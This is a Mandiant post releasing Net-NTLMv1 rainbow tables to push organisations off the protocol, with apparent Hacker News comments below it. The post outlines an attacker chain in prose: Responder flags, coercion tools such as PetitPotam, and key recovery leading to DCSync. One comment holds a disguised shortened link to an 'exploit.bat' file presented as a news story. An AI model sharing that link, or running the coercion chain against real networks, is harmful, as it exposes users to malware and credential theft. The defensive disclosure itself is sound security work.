Mandiant aims to lower the barrier for security professionals to demonstrate the insecurity of Net-NTLMv1.
Mandiant is publicly releasing a comprehensive dataset of Net-NTLMv1 rainbow tables to underscore the urgency of migrating away from this outdated protocol. Despite Net-NTLMv1 being deprecated and known to be insecure for over two decades—with cryptanalysis dating back to 1999—Mandiant consultants continue to identify its use in active environments. This legacy protocol leaves organizations vulnerable to trivial credential theft, yet it remains prevalent due to inertia and a lack of demonstrated immediate risk.
By releasing these tables, Mandiant aims to lower the barrier for security professionals to demonstrate the insecurity of Net-NTLMv1. While tools to exploit this protocol have existed for years, they often required uploading sensitive data to third-party services or expensive hardware to brute-force keys. The release of this dataset allows defenders and researchers to recover keys in under 12 hours using consumer hardware costing less than $600 USD. This initiative highlights the amplified impact of combining Mandiant's frontline expertise with Google Cloud's resources to eliminate entire classes of attacks.
This post details the generation of the tables, provides access to the dataset for community use, and outlines critical remediation steps to disable Net-NTLMv1 and prevent authentication coercion attacks.
Background
Net-NTLMv1 has been widely known to be insecure since at least 2012, following presentations at DEFCON 20, with cryptanalysis of the underlying protocol dating back to at least 1999. On Aug. 30, 2016, Hashcat added support for cracking Data Encryption Standard (DES) keys using known plaintext, further democratizing the ability to attack this protocol. Rainbow tables are almost as old, with the initial paper on rainbow tables published in 2003 by Philippe Oechslin, citing an earlier iteration of a time-memory trade-off from 1980 by Martin Hellman.
Essentially, if an attacker can obtain a Net-NTLMv1 hash without Extended Session Security (ESS) for the known plaintext of 1122334455667788, a cryptographic attack, referred to as a known plaintext attack (KPA), can be applied. This guarantees recovery of the key material used. Since the key material is the password hash of the authenticating Active Directory (AD) object—user or computer—the attack results can quickly be used to compromise the object, often leading to privilege escalation.
A common chain attackers use is authentication coercion from a highly privileged object, such as a domain controller (DC). Recovering the password hash of the DC machine account allows for DCSync privileges to compromise any other account in AD.
Dataset Release
The unsorted dataset can be downloaded using gsutil -m cp -r gs://net-ntlmv1-tables/tables . or through the Google Cloud Research Dataset portal.
The SHA512 hashes of the tables can be checked by first downloading the checksums gsutil -m cp gs://net-ntlmv1-tables/tables.sha512 . then checked by sha512sum -c tables.sha512. The password cracking community has already created derivative work and is also hosting the ready to use tables.
Use of the Tables
Once a Net-NTLMv1 hash has been obtained, the tables can be used with historical or modern reinventions of rainbow table searching software such as rainbowcrack (rcrack), or RainbowCrack-NG on central processing units (CPUs) or a fork of rainbowcrackalack on graphics processing units (GPUs). The Net-NTLMv1 hash needs to be preprocessed to the DES components using ntlmv1-multi as shown in the next section.
Obtaining a Net-NTLMv1 Hash
Most attackers will use Responder with the --lm and --disable-ess flags and set the authentication to a static value of 1122334455667788 to only allow for connections with Net-NTLMv1 as a possibility. Attackers can then wait for incoming connections or coerce authentication using a tool such as PetitPotam or DFSCoerce to generate incoming connections from DCs or lower privilege hosts that are useful for objective completion. Responses can be cracked to retrieve password hashes of either users or computer machine accounts. A sample workflow for an attacker is shown below in Figure 1, Figure 2, and Figure 3.
Read the original article
Comments
By dbetteridge 2026-01-170:443 reply I recall using ntlm rainbow tables to crack windows hashes in high school in like 2008?
Amazing that this is still around and causing someone enough of a headache to justify spending money on.
Also amazing what a teenager with lots of free time and a bootable Linux usb can get up to.
By eerikkivistik 2026-01-171:36 There used to be a joint online project to compute these tables in a SETI like distributed system. Everyone who contributed their CPU cycles, could use the tables. And yeah, around 2005-2008.
LM, nthash aka NTLM, net-ntlmv1 aka ntlmv1, net-ntlmv2 aka NTLMv2. Challenge response stuff is different. Naming here is painful.
net-ntlmv1 rainbow tables have been around forever too though, the same attack documented in this blog post has been hosted as a web service at https://crack.sh/netntlm/ for 10+ years
By 1over137 2026-01-174:07 Yeah, but now it's Google! Google!
By dbetteridge 2026-01-170:572 reply Ah Microsoft and naming things... Name a better combo
But fair enough, I don't recall which exact version I was mucking with that long ago.
By CableNinja 2026-01-174:262 reply A few years ago i was doing some vm things in azure. Hadnt touched azure before, and spent 10+ minutes of frustration trying to figure out how to get amd64/x86_64 things started, as the only thing i could find was "Azure ARM", and on googling, "arm" here means azure resource manager... ARGH why does microsoft insist on using existing names and acronyms!?!?
By Greed 2026-01-1810:19 I was part of a user study on Azure back when it first rolled out-- they were looking for seniors with an AWS background to participate in UX research, and I remember walking out of that study with imposter syndrome for the very first time. Spent 60 minutes totally unable to do the thing I wanted to do when I was introduced to Azure for the first time, and I remember thinking... am I a fraud?
No! Not this time, at least. In hindsight everything was named and organized terribly and it hasn't improved much since.
By antonkochubey 2026-01-1722:50 Because in their eyes if something was not invented here, it may as well not exist :-) they haven’t managed to cure this sickness in decades.
Ya they just announced they are renaming security algos to copilot!!! story here -> https://dubious-adware-breach-scam@is.gd/WVZvnI?exploit.bat
By phanimahesh 2026-01-172:40 Love this. Classic microsoft.
yep, that and also can use cain and abel even back then... hardest part was putting whatever network card in promiscious mode.
By dbetteridge 2026-01-182:05 Yes!! That was the software, thanks for the memory trigger
By tialaramex 2026-01-1712:222 reply To be vulnerable to this, what sort of dumb things are end users doing?
I couldn't immediately figure out here whether we're talking
0. Microsoft's supported products default enable this worthless "authentication" feature
1. Microsoft's supported products provide such a feature behind a UI that's not clearly marked "Danger: Do not stare into laser with remaining eye"
2: Microsoft does still support this, behind some Registry nonsense most users do not understand and once enabled it doesn't turn on the "I am a toxic waste dump, leave by nearest exit" warning signs on affected machines
3: Microsoft doesn't support this at all but some 3rd party commercial stuff does and customers really do love their crusty archaic 3rd party garbage
4: But this long abandoned SCO machine we've kept on life support for twenty years!
5: What does "supported" mean? Windows NT is scary, we're still on Windows 98 here.
By nolok 2026-01-1713:56 You have to actively go out of your way to have this enabled. But large or older companies always have some old machine (can be as dumb a an old but very expensive printer) that isn't updated.
Even today the only reason to use samba 2 in 90% of companies where it's enabled are old appliances.
At some point device X isn't working, employees complain, IT say they need to buy a new very expensive replacement and after much argumentation they come to the agreement to enable that legacy horror support until the purchase can be made. Which is then never made.
This is mostly an issue in active directory networks. Usually the reason people give as to why they still have this enabled is due to some legacy system that can't authenticate via Kerberos or at least NetNTLMv2. Worst case is if they then enable NetNTLMv1 on the domain controllers, even if the DC acts as a client. Using authentication coercion, this is a pretty quick win for an adversary.
By tialaramex 2026-01-1715:251 reply Ok, so it's a 2 on my list.
Microsoft needs to make this forcibly change the UI so that users can see "Oh! I'm using crap low security Windows". That lights a fire under people to actually get it fixed.
By rainonmoon 2026-01-180:14 Using any variant of NTLM is insecure, which is why Microsoft is phasing it out in Windows 11/Server 2025. Which means we should be free of it some time around 2060.
For those interested: The SHA512 file lists 4096 files. Each file is 2 GiB. That means 8 TiB (or about 8.6 TB) of storage required.
By myself248 2026-01-1714:19 Rule of thumb: Saturating 100Mbps moves roughly 1TB/day.
